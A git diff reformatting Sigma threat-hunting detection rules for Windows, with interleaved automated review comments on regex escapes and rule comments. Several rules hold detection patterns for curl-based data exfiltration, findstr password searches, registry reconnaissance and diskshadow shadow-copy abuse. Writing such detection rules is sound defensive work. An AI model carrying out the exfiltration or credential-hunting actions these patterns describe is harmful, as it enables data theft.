 - https://learn.microsoft.com/en-us/powershell/module/smbshare/new-smbmapping?view=windowsserver2022-ps
@@ -32,8 +31,6 @@ detection:
 - -TransportType QUIC
 condition: ps_script and selection
 falsepositives:
- - Due to the nature of the script block, the matching of the string could sometimes
- result in a false positive. Use this rule to hunt for potential malicious
- or suspicious scripts.
+ - Due to the nature of the script block, the matching of the string could sometimes result in a false positive. Use this rule to hunt for potential malicious or suspicious scripts.
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_registry_reconnaissance.yml b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_registry_reconnaissance.yml
index 733eb328b..af8e3f73f 100644
--- a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_registry_reconnaissance.yml
+++ b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_registry_reconnaissance.yml
@@ -1,12 +1,10 @@
 title: Potential Registry Reconnaissance Via PowerShell Script
 id: 064060aa-09fb-4636-817f-020a32aa7e9e
 related:
- - id: 970007b7-ce32-49d0-a4a4-fbef016950bd
- type: similar
+ - id: 970007b7-ce32-49d0-a4a4-fbef016950bd
+ type: similar
 status: experimental
-description: Detects PowerShell scripts with potential registry reconnaissance capabilities.
- Adversaries may interact with the Windows registry to gather information about
- the system credentials, configuration, and installed software.
+description: Detects PowerShell scripts with potential registry reconnaissance capabilities. Adversaries may interact with the Windows registry to gather information about the system credentials, configuration, and installed software.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md
 author: frack113
@@ -27,11 +25,10 @@ detection:
 - Microsoft-Windows-PowerShell/Operational
 - PowerShellCore/Operational
 selection:
+ # TODO: switch to |re|i: after sigma specification v2 is released
 ScriptBlockText|re: (Get-Item|gci|Get-ChildItem).{1,64}-Path.{1,64}\\(currentcontrolset\\services|CurrentVersion\\Policies\\Explorer\\Run|CurrentVersion\\Run|CurrentVersion\\ShellServiceObjectDelayLoad|CurrentVersion\\Windows\winlogon)\\
 condition: ps_script and selection
 falsepositives:
- - Due to the nature of the script block, the matching of the string could sometimes
- result in a false positive. Use this rule to hunt for potential malicious
- or suspicious scripts.
+ - Due to the nature of the script block, the matching of the string could sometimes result in a false positive. Use this rule to hunt for potential malicious or suspicious scripts.
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_remove_item_path.yml b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_remove_item_path.yml
index 82362d40c..3036a73d5 100644
--- a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_remove_item_path.yml
+++ b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_remove_item_path.yml
@@ -1,8 +1,7 @@
 title: Use Of Remove-Item to Delete File - ScriptBlock
 id: b8af5f36-1361-4ebe-9e76-e36128d947bf
 status: test
-description: PowerShell Remove-Item with -Path to delete a file or a folder with
- "-Recurse"
+description: PowerShell Remove-Item with -Path to delete a file or a folder with "-Recurse"
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md
 - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7
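Review bot: The `ScriptBlockText|re:` pattern that the new TODO annotates ends its last alternative with `CurrentVersion\\Windows\winlogon`, a single backslash before `winlogon`, while every other path separator in the same pattern is written as `\\`; in the regex engines Sigma backends use, `\w` is a word-character class, so a literal `Windows\winlogon` path would appear not to match this branch. Unless that is intentional, the alternative should read `CurrentVersion\\Windows\\winlogon`. The TODO itself is accurate: until the `|re|i` modifier is available the match is case-sensitive, so cmdlet and key-path spellings that differ only in case from the ones listed are not covered, which is worth stating in the comment (`# TODO: switch to |re|i: after sigma specification v2 is released (pattern is currently case-sensitive)`). The enclosing `detection:` block starts outside the hunk.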
diff --git a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_win_api_functions_access.yml b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_win_api_functions_access.yml
index aed71c92c..282d23537 100644
--- a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_win_api_functions_access.yml
+++ b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_win_api_functions_access.yml
@@ -1,16 +1,14 @@
 title: WinAPI Library Calls Via PowerShell Scripts
 id: 19d65a1c-8540-4140-8062-8eb00db0bba5
 related:
- - id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702
- type: similar
- - id: 03d83090-8cba-44a0-b02f-0b756a050306
- type: similar
- - id: 9f22ccd5-a435-453b-af96-bf99cbb594d4
- type: similar
+ - id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702
+ type: similar
+ - id: 03d83090-8cba-44a0-b02f-0b756a050306
+ type: similar
+ - id: 9f22ccd5-a435-453b-af96-bf99cbb594d4
+ type: similar
 status: experimental
-description: Detects calls to WinAPI libraries from PowerShell scripts. Attackers
- can often leverage these APIs to avoid detection based on typical PowerShell function
- calls. Use this rule as a basis to hunt for interesting scripts.
+description: Detects calls to WinAPI libraries from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.
 references:
 - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
 author: Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_win_api_library_access.yml b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_win_api_library_access.yml
index 4700ff5a1..39feeab87 100644
--- a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_win_api_library_access.yml
+++ b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_win_api_library_access.yml
@@ -1,16 +1,14 @@
 title: WinAPI Function Calls Via PowerShell Scripts
 id: 9f22ccd5-a435-453b-af96-bf99cbb594d4
 related:
- - id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702
- type: similar
- - id: 03d83090-8cba-44a0-b02f-0b756a050306
- type: similar
- - id: 19d65a1c-8540-4140-8062-8eb00db0bba5
- type: similar
+ - id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702
+ type: similar
+ - id: 03d83090-8cba-44a0-b02f-0b756a050306
+ type: similar
+ - id: 19d65a1c-8540-4140-8062-8eb00db0bba5
+ type: similar
 status: experimental
-description: Detects calls to WinAPI functions from PowerShell scripts. Attackers
- can often leverage these APIs to avoid detection based on typical PowerShell function
- calls. Use this rule as a basis to hunt for interesting scripts.
+description: Detects calls to WinAPI functions from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.
 references:
 - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
 author: Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems)
@@ -72,8 +70,6 @@ detection:
 - ZeroFreeGlobalAllocUnicode
 condition: ps_script and selection
 falsepositives:
- - This rule is mainly used for hunting and will generate quite a lot of false
- positives when applied in production. It's best combined with other fields
- such as the path of execution, the parent process, etc.
+ - This rule is mainly used for hunting and will generate quite a lot of false positives when applied in production. It's best combined with other fields such as the path of execution, the parent process, etc.
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_csc_compilation.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_csc_compilation.yml
index a84f1c608..ff0078713 100644
--- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_csc_compilation.yml
+++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_csc_compilation.yml
@@ -1,11 +1,10 @@
 title: Dynamic .NET Compilation Via Csc.EXE - Hunting
 id: acf2807c-805b-4042-aab9-f86b6ba9cb2b
 related:
- - id: dcaa3f04-70c3-427a-80b4-b870d73c94c4
- type: derived
+ - id: dcaa3f04-70c3-427a-80b4-b870d73c94c4
+ type: derived
 status: experimental
-description: Detects execution of "csc.exe" to compile .NET code. Attackers often
- leverage this to compile code on the fly and use it in other stages.
+description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
 references:
 - https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/
 - https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
@@ -25,11 +24,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains: /noconfig /fullpaths @
- NewProcessName|endswith: \csc.exe
+ CommandLine|contains: /noconfig /fullpaths @
+ NewProcessName|endswith: \csc.exe
 condition: process_creation and selection
 falsepositives:
- - Many legitimate applications make use of dynamic compilation. Use this rule
- to hunt for anomalies
+ - Many legitimate applications make use of dynamic compilation. Use this rule to hunt for anomalies
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_download.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_download.yml
index 472ed74ce..821259033 100644
--- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_download.yml
+++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_download.yml
@@ -1,10 +1,10 @@
 title: File Download Via Curl.EXE
 id: 9a517fca-4ba3-4629-9278-a68694697b81
 related:
- - id: bbeaed61-1990-4773-bf57-b81dbad7db2d
- type: derived
- - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468
- type: derived
+ - id: bbeaed61-1990-4773-bf57-b81dbad7db2d # Basic curl execution
+ type: derived
+ - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 # Suspicious curl execution
+ type: derived
 status: test
 description: Detects file download using curl.exe
 references:
@@ -24,18 +24,17 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \curl.exe
- - Product: The curl executable
+ - NewProcessName|endswith: \curl.exe
+ - Product: The curl executable
 selection_remote:
- CommandLine|contains:
- - ' -O'
+ CommandLine|contains:
+ - ' -O' # covers the alias for --remote-name and --output
 - --remote-name
 - --output
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Scripts created by developers and admins
 - Administrative activity
- - The "\Git\usr\bin\sh.exe" process uses the "--output" flag to download a specific
- file in the temp directory with the pattern "gfw-httpget-xxxxxxxx.txt "
+ - The "\Git\usr\bin\sh.exe" process uses the "--output" flag to download a specific file in the temp directory with the pattern "gfw-httpget-xxxxxxxx.txt "
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_execution.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_execution.yml
index 3d8bfccd2..db3ea5d98 100644
--- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_execution.yml
+++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_execution.yml
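Review bot: The comment added on `' -O'` in `selection_remote` reads as if `-O` were the short form of both long options; it is the alias of `--remote-name` only, and `-o` (`--output`) is caught by the same entry solely because Sigma's `contains` modifier matches case-insensitively. A comment that states this keeps the next maintainer from "fixing" the missing `-o` entry: `- ' -O' # -O (--remote-name); also matches -o (--output) because contains is case-insensitive`. The enclosing `detection:` block starts outside the hunk.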
@@ -1,11 +1,10 @@
 title: Curl.EXE Execution
 id: bbeaed61-1990-4773-bf57-b81dbad7db2d
 related:
- - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468
- type: derived
+ - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 # Suspicious curl execution
+ type: derived
 status: test
-description: Detects a curl process start on Windows, which could indicates a file
- download from a remote location or a simple web request to a remote server
+description: Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server
 references:
 - https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464
 author: Florian Roth (Nextron Systems)
@@ -23,8 +22,8 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- - NewProcessName|endswith: \curl.exe
- - Product: The curl executable
+ - NewProcessName|endswith: \curl.exe
+ - Product: The curl executable
 condition: process_creation and selection
 falsepositives:
 - Scripts created by developers and admins
diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_fileupload.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_fileupload.yml
index 119bb2497..3e3a9071b 100644
--- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_fileupload.yml
+++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_fileupload.yml
@@ -1,8 +1,7 @@
 title: Potential Data Exfiltration Via Curl.EXE
 id: 00bca14a-df4e-4649-9054-3f2aa676bc04
 status: test
-description: Detects the execution of the "curl" process with "upload" flags. Which
- might indicate potential data exfiltration
+description: Detects the execution of the "curl" process with "upload" flags. Which might indicate potential data exfiltration
 references:
 - https://twitter.com/d1r4c/status/1279042657508081664
 - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76
@@ -24,17 +23,17 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \curl.exe
- - Product: The curl executable
+ - NewProcessName|endswith: \curl.exe
+ - Product: The curl executable
 selection_cli:
- - CommandLine|contains:
- - ' --form'
- - ' --upload-file '
- - ' --data '
- - ' --data-'
- - CommandLine|re: \s-[FTd]\s
+ - CommandLine|contains:
+ - ' --form' # Also covers the "--form-string"
+ - ' --upload-file '
+ - ' --data '
+ - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode"
+ - CommandLine|re: \s-[FTd]\s # We use regex to ensure a case sensitive argument detection
 filter_optional_localhost:
- CommandLine|contains:
+ CommandLine|contains:
 - ://localhost
 - ://127.0.0.1
 condition: process_creation and (all of selection_* and not 1 of filter_optional_*)
diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_useragent.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_useragent.yml
index f357f5150..0ed9b8f50 100644
--- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_useragent.yml
+++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_useragent.yml
@@ -20,10 +20,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection_curl:
- - NewProcessName|endswith: \curl.exe
- - Product: The curl executable
+ - NewProcessName|endswith: \curl.exe
+ - Product: The curl executable
 selection_opt:
- CommandLine|contains:
+ CommandLine|contains:
 - ' -A '
 - ' --user-agent '
 condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_dfsvc_child_processes.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_dfsvc_child_processes.yml
index 589debe34..45f928bdb 100644
--- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_dfsvc_child_processes.yml
+++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_dfsvc_child_processes.yml
@@ -1,8 +1,7 @@
 title: ClickOnce Deployment Execution - Dfsvc.EXE Child Process
 id: 241d52b5-eee0-49d0-ac8a-8b9c15c7221c
 status: experimental
-description: Detects child processes of "dfsvc" which indicates a ClickOnce deployment
- execution.
+description: Detects child processes of "dfsvc" which indicates a ClickOnce deployment execution.
 references:
 - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -20,10 +19,9 @@ detection:
 Channel: Security
 selection:
 ParentProcessName|endswith: \dfsvc.exe
- NewProcessName|endswith: \AppData\Local\Apps\2.0\
+ NewProcessName|endswith: \AppData\Local\Apps\2.0\
 condition: process_creation and selection
 falsepositives:
- - False positives are expected in environement leveraging ClickOnce deployments.
- An initial baselining is required before using this rule in production.
+ - False positives are expected in environement leveraging ClickOnce deployments. An initial baselining is required before using this rule in production.
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_diskshadow_child_process.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_diskshadow_child_process.yml
index c70b8c6b2..194d1dd9e 100644
--- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_diskshadow_child_process.yml
+++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_diskshadow_child_process.yml
@@ -1,18 +1,16 @@
 title: Diskshadow Child Process Spawned
 id: 56b1dde8-b274-435f-a73a-fb75eb81262a
 related:
- - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1
- type: similar
- - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f
- type: similar
- - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8
- type: similar
- - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2
- type: similar
+ - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location
+ type: similar
+ - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution
+ type: similar
+ - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE
+ type: similar
+ - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution
+ type: similar
 status: experimental
-description: Detects any child process spawning from "Diskshadow.exe". This could
- be due to executing Diskshadow in interpreter mode or script mode and using the
- "exec" flag to launch other applications.
+description: Detects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications.
 references:
 - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
 - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration
@@ -34,7 +32,7 @@ detection:
 selection:
 ParentProcessName|endswith: \diskshadow.exe
 filter_main_werfault:
- NewProcessName|endswith: :\Windows\System32\WerFault.exe
+ NewProcessName|endswith: :\Windows\System32\WerFault.exe
 condition: process_creation and (selection and not 1 of filter_main_*)
 falsepositives:
 - Likely from legitimate usage of Diskshadow in Interpreter mode.
diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_diskshadow_script_mode.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_diskshadow_script_mode.yml
index 4c58b57ec..5961f4301 100644
--- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_diskshadow_script_mode.yml
+++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_diskshadow_script_mode.yml
@@ -1,20 +1,17 @@
 title: Diskshadow Script Mode Execution
 id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2
 related:
- - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1
- type: similar
- - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f
- type: similar
- - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8
- type: similar
- - id: 56b1dde8-b274-435f-a73a-fb75eb81262a
- type: similar
+ - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location
+ type: similar
+ - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution
+ type: similar
+ - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE
+ type: similar
+ - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned
+ type: similar
 status: test
-description: 'Detects execution of "Diskshadow.exe" in script mode using the "/s"
- flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow
- copies on the systems. Investigate the content of the scripts and its location.
-
- '
+description: |
+ Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location.
 references:
 - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
 - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration
@@ -35,10 +32,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - OriginalFileName: diskshadow.exe
- - NewProcessName|endswith: \diskshadow.exe
+ - OriginalFileName: diskshadow.exe
+ - NewProcessName|endswith: \diskshadow.exe
 selection_cli:
- CommandLine|contains:
+ CommandLine|contains:
 - '/s '
 - '-s '
 condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_findstr_password_recon.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_findstr_password_recon.yml
index d480fd9a4..88254635d 100644
--- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_findstr_password_recon.yml
+++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_findstr_password_recon.yml
@@ -1,8 +1,7 @@
 title: Potential Password Reconnaissance Via Findstr.EXE
 id: 1a0f6f16-2099-4753-9a02-43b6ac7a1fa5
 status: experimental
-description: Detects command line usage of "findstr" to search for the "passwords"
- keyword in a variety of different languages
+description: Detects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages
 references:
 - https://steflan-security.com/windows-privilege-escalation-credential-harvesting/
 - https://adsecurity.org/?p=2288
@@ -20,19 +19,19 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \findstr.exe
- - OriginalFileName: FINDSTR.EXE
+ - NewProcessName|endswith: \findstr.exe
+ - OriginalFileName: FINDSTR.EXE
 selection_cli:
- CommandLine|contains:
- - "contrase\xF1a"
- - "has\u0142o"
- - heslo
- - parola
- - passe
- - passw
- - senha
- - senord
- - "\u5BC6\u78BC"
+ CommandLine|contains:
+ - contraseña # Spanish
+ - hasło # Polish
+ - heslo # Czech
+ - parola # Italian
+ - passe # French
+ - passw # German, English
+ - senha # Portuguese
+ - senord # Swedish
+ - 密碼 # Cantonese
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_net_quic.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_net_quic.yml
index 1e7dcb1c3..e1b1d9e34 100644
--- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_net_quic.yml
+++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_net_quic.yml
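Review bot: The language label on the last `selection_cli` entry is inaccurate: `密碼` is the Traditional Chinese spelling of "password" and Cantonese is a spoken variety, so `# Chinese (Traditional)` is the correct comment; the Simplified form `密码` is a different code-point sequence and is not in the list, which is worth noting if the gap is intentional. The hunk also replaces the `\xF1`, `\u0142` and `\u5BC6\u78BC` escapes with raw characters, so the selectors now depend on the file being read as UTF-8; a short comment above `CommandLine|contains:` such as `# Non-ASCII keywords below are stored as UTF-8; keep the file encoding unchanged` protects against an editor silently re-encoding them. The enclosing `detection:` block starts outside the hunk.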
@@ -1,11 +1,10 @@
 title: SMB over QUIC Via Net.EXE
 id: 2238d337-42fb-4971-9a68-63570f2aede4
 related:
- - id: 6df07c3b-8456-4f8b-87bb-fe31ec964cae
- type: similar
+ - id: 6df07c3b-8456-4f8b-87bb-fe31ec964cae
+ type: similar
 status: experimental
-description: Detects the mounting of Windows SMB shares over QUIC, which can be an
- unexpected event in some enterprise environments.
+description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md
 - https://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/
@@ -23,14 +22,14 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith:
- - \net.exe
- - \net1.exe
- - OriginalFileName:
- - net.exe
- - net1.exe
+ - NewProcessName|endswith:
+ - \net.exe
+ - \net1.exe
+ - OriginalFileName:
+ - net.exe
+ - net1.exe
 selection_cli:
- CommandLine|contains: /TRANSPORT:QUIC
+ CommandLine|contains: /TRANSPORT:QUIC
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Administrative activity
diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_office_svchost_parent.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_office_svchost_parent.yml
index 17ef949b3..253924ee6 100644
--- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_office_svchost_parent.yml
+++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_office_svchost_parent.yml
@@ -1,14 +1,9 @@
 title: Suspicious New Instance Of An Office COM Object
 id: 9bdaf1e9-fdef-443b-8081-4341b74a7e28
 status: test
-description: 'Detects an svchost process spawning an instance of an office application.
- This happens when the initial word application creates an instance of one of the
- Office COM objects such as ''Word.Application'', ''Excel.Application'', etc.
-
- This can be used by malicious actors to create malicious Office documents with
- macros on the fly. (See vba2clr project in the references)
-
- '
+description: |
+ Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.
+ This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)
 references:
 - https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic
 - https://github.com/med0x2e/vba2clr
@@ -28,7 +23,7 @@ detection:
 Channel: Security
 selection:
 ParentProcessName|endswith: \svchost.exe
- NewProcessName|endswith:
+ NewProcessName|endswith:
 - \eqnedt32.exe
 - \excel.exe
 - \msaccess.exe
diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml
index eb8ac5d4d..a082a9beb 100644
--- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml
+++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml
@@ -1,8 +1,7 @@ title: Unusually Long PowerShell CommandLine id: d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6 status: test -description: Detects unusually long PowerShell command lines with a length of 1000 - characters or more +description: Detects unusually long PowerShell command lines with a length of 1000 characters or more references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse author: oscd.community, Natalia Shornikova @@ -20,16 +19,16 @@ detection: EventID: 4688 Channel: Security selection_powershell: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Description: Windows Powershell - - Product: PowerShell Core 6 + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Description: Windows Powershell + - Product: PowerShell Core 6 selection_length: - CommandLine|re: .{1000,} + CommandLine|re: .{1000,} condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_crypto_namespace.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_crypto_namespace.yml index 016dad1d3..aa785a45a 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_crypto_namespace.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_crypto_namespace.yml 
@@ -1,15 +1,10 @@ title: Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace id: ad856965-f44d-42a8-945e-bbf7bd03d05a status: experimental -description: 'Detects the invocation of PowerShell commands with references to classes - from the "System.Security.Cryptography" namespace. - - The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly - encryption and decryption. - +description: | + Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace. + The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion. - - ' references: - https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-8.0 - https://blogs.vmware.com/security/2023/11/jupyter-rising-an-update-on-jupyter-infostealer.html @@ -29,16 +24,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cmdlet_namespace: - CommandLine|contains: System.Security.Cryptography. + CommandLine|contains: System.Security.Cryptography. selection_cmdlet_classes: - CommandLine|contains: + CommandLine|contains: - .AesCryptoServiceProvider - .DESCryptoServiceProvider - .DSACryptoServiceProvider 
@@ -48,7 +43,6 @@ detection: - .TripleDESCryptoServiceProvider condition: process_creation and (all of selection_*) falsepositives: - - Classes are legitimately used, but less so when e.g. parents with low prevalence - or decryption of content in temporary folders. + - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders. level: medium ruletype: Sigma diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_import_module.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_import_module.yml index 3b94d8ef4..41e2f85ff 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_import_module.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_import_module.yml @@ -1,8 +1,7 @@ title: Import New Module Via PowerShell CommandLine id: 4ad74d01-f48c-42d0-b88c-b31efa4d2262 status: experimental -description: Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets - to the current PowerShell session +description: Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets to the current PowerShell session references: - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-7.3 - 